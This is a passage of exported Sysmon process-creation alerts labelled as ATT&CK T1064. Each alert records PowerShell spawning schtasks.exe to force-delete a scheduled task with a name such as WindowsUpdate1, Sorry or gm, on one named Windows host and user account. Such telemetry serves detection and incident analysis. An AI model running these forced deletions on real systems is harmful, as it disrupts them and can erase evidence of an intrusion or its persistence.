+LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.647779400Z"",""eventRecordID"":""2221"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.642\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001069ce1900}\r\nProcessId: 6732\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.642"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001069ce1900}"",""processId"":""6732"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.088",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.605 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d8cc1900} +ProcessId: 4016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.608370600Z"",""eventRecordID"":""2220"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.605\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010d8cc1900}\r\nProcessId: 4016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:36.605"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010d8cc1900}"",""processId"":""4016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.580 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001047cb1900} +ProcessId: 6840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.587257100Z"",""eventRecordID"":""2219"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.580\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001047cb1900}\r\nProcessId: 6840\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.580"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001047cb1900}"",""processId"":""6840"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.043",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.551 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010b5c91900} +ProcessId: 7144 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.552927400Z"",""eventRecordID"":""2218"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.551\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010b5c91900}\r\nProcessId: 7144\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.551"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010b5c91900}"",""processId"":""7144"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.025",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.525 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001025c81900} +ProcessId: 
3268 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.528331600Z"",""eventRecordID"":""2217"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.525\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001025c81900}\r\nProcessId: 3268\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.525"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001025c81900}"",""processId"":""3268"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 
-s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.008",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.503 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001096c61900} +ProcessId: 424 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.505794900Z"",""eventRecordID"":""2216"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.503\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001096c61900}\r\nProcessId: 424\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 
10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.503"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001096c61900}"",""processId"":""424"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.994",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.481 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001007c51900} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm 
